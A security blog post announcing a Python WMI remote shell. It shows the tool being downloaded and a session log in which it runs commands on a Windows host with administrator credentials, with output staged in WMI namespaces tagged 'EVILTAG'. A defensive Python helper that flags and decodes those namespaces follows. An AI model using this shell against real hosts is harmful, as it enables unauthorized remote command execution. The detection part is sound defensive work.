[hacking tricks] A full-featured WMI shell

Thanks to the efforts of Andrei Dumitrescu, a full-featured WMI shell written in Python is now available. The tool was developed for Andrei's talk at #HES2014 [http://2014.hackitoergosum.org/], which is taking place right now.

The presentation slides are available at the following link [here].


root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive:  wmi-shell.zip
   creating: wmi-shell/
  inflating: wmi-shell/LICENSE
  inflating: wmi-shell/wmi-shell.py
  inflating: wmi-shell/README
  inflating: wmi-shell/base.vbs
   creating: wmi-shell/bin/
  inflating: wmi-shell/bin/base64.c
  inflating: wmi-shell/bin/base64.exe
  inflating: wmi-shell/bin/wmis
  inflating: wmi-shell/bin/wmic
   creating: wmi-shell/b64-source/
  inflating: wmi-shell/b64-source/base64.exe
  inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to  10.1.37.134  ETA: ~6.4 seconds.
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs" 2>/dev/null  <-- . Returned code:  1
...
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs" 2>/dev/null  <-- . Returned code:  1
>>> dir C:\\
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"dir C:\\\"" 2>/dev/null  <-- . Returned code:  1
Executed command -->   ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp  <-- . Returned code:  0
waiting for command output . . Executed command -->   ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp  <-- . Returned code:  0
.  done !
Executed command -->   ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp  <-- . Returned code:  0
Volume in drive C has no label.
 Volume Serial Number is 8E25-9E63

 Directory of C:\

14.07.2009  07:20    <DIR>          PerfLogs
19.04.2014  03:12    <DIR>          Program Files
19.04.2014  22:04    <DIR>          Program Files (x86)
19.04.2014  03:05    <DIR>          Users
20.04.2014  04:19    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  82 326 290 432 bytes free
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"cleanup\"" 2>/dev/null  <-- . Returned code:  1
>>>
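The transcript above shows the tool's transport: command output is base64-encoded by the pushed VBS (`base64_encode`), then staged as `__Namespace` instances under `root\default` (a `DOWNLOAD_READY` marker plus `EVILTAG`-prefixed names), which the client polls with `wmic`. That makes unexpected child namespaces of `root\default` a useful detection point. The triage helper below is an added example, not part of wmi-shell; it works offline over a collected list of namespace names, and the chunk layout it decodes (`EVILTAG` directly followed by a base64 chunk) and the `ms_409` baseline are assumptions.

```python
import base64
import binascii

# Child namespaces expected under root\default on a clean host.
# Constructed allowlist for this example; derive yours from a reference image.
BASELINE_ROOT_DEFAULT = {"ms_409"}

# Markers visible in the wmi-shell session above.
MARKER_READY = "DOWNLOAD_READY"
MARKER_PREFIX = "EVILTAG"


def _try_b64(chunk):
    """Decode one staged chunk; returns None when it is not clean base64.
    Assumed layout: the text after the EVILTAG prefix is the raw base64."""
    try:
        return base64.b64decode(chunk, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage_namespaces(names, baseline=BASELINE_ROOT_DEFAULT):
    """Classify __Namespace names collected from root\\default.

    markers:    names matching the tool's staging convention
    unexpected: names outside the baseline that match no marker
    recovered:  decoded payload fragments from EVILTAG-prefixed names
    """
    findings = {"markers": [], "unexpected": [], "recovered": []}
    for name in names:
        if name == MARKER_READY or name.startswith(MARKER_PREFIX):
            findings["markers"].append(name)
        elif name not in baseline:
            findings["unexpected"].append(name)
        if name.startswith(MARKER_PREFIX):
            decoded = _try_b64(name[len(MARKER_PREFIX):])
            if decoded is not None:
                findings["recovered"].append(decoded)
    return findings


if __name__ == "__main__":
    # Constructed listing, as if read from `wmic --namespace='root\default'
    # "select Name from __Namespace"` on a host where the shell was used.
    sample = ["ms_409", "DOWNLOAD_READY", "EVILTAGZGlyIEM6XA==", "Other"]
    for key, values in triage_namespaces(sample).items():
        print(f"{key}: {values}")
```

Hits in `markers` or `recovered` indicate the shell's staging channel; entries in `unexpected` deserve a look even if they do not match this tool's naming, since the prefix is trivially renamed.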
